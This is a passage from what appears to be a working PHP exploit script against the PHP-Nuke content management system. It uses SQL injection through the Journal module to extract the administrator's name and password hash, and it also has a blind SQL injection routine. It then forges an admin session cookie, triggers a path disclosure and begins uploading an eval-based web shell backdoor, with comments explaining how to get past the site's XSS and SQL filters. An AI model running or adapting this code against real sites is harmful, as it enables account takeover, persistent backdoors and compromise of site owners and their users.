$http->postdata="title=wow\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
sleep(2);
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
$jid=explode("\">wow<",$jid);
$jid=explode("jid=", $jid[0]);
$jid=explode("\">",$jid[1]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);
$inj=explode("Last updated on ",$response);
$inj=explode(" @ ",$inj[1]);
$pass_hash=$inj[0];
$inj=explode("<",$inj[1]);
$user_name=$inj[0];
}
}else{
$http->postdata='';
//Find the primary key of the journal entry we just created.
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid=explode("\">wow',<",$jid);
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
if(!strpos($response,"31337")){
die("target has patched!\n");
}else{
print "Target vulnerable to a privilege escalation attack!!!\n";
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$aid=explode("<",$aid);
$pwd=explode("<",$pwd);
$user_name=$aid[0];
$pass_hash=$pwd[0];
}
}
}else{
$sex->sleep="sleep(5)";
print "Starting Attack Against:".$attack_url."/\n";
print "Testing for blind sql injection...\n";
if(!$sex->test_target()){
print("Target might be running 8.1.35\n");
print("Try the privilege esciation attack to upload the shell:");
die("./php_exploit -t -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
}
print "Target is vulnerable to blind sql injection!!!\n";
print "Please Standby For Attack...\n";
$pass_hash=$sex->find_md5("pwd");
$user_name=$sex->find_string("aid");
print "attacked used:".$sex->request_count." requests.\n";
}
print "Found Admin's name:".$user_name."\n";
print "Found MD5 Password hash:".$pass_hash."\n";
$admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";
}
print "Using Admin Session ID:\n".$admin_cookie."\n";
$http->cookie=$admin_cookie;
//ipban.php
sleep(3);
//This request will tell us what version of php-nuke it is.
//If it is 8, Then the page gives us configuration information to perserve.
$admin_options=$http->send($attack_url."/admin.php?op=general");
if(!strstr($admin_options,"Content-Length: 0")){
print "PHP-Nuke 8 detected.\n";
$option_values=explode("value='",$admin_options);
$x=0;
array_shift($option_values);
//Parsing out and storing configuration values to restore them after the hack.
foreach( $option_values as $value){
$value=explode("'",$value);
$values[]=urlencode($value[0]);
if($x++==4)
break;
}
//ipban.php
sleep(2);
//Enable error reporting
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");
//Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].
$http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
$remote_path=$http->getPath($attack_url."/admin.php",3);
sleep(2);
if(strstr($remote_path,':\\')){
print "Windows box detected.\n";
print "Remote path:$remote_path\n";
print "Uploading backdoor...\n";
$remote_path=addslashes(addslashes($remote_path."\\frontend.php"));
$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
//Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php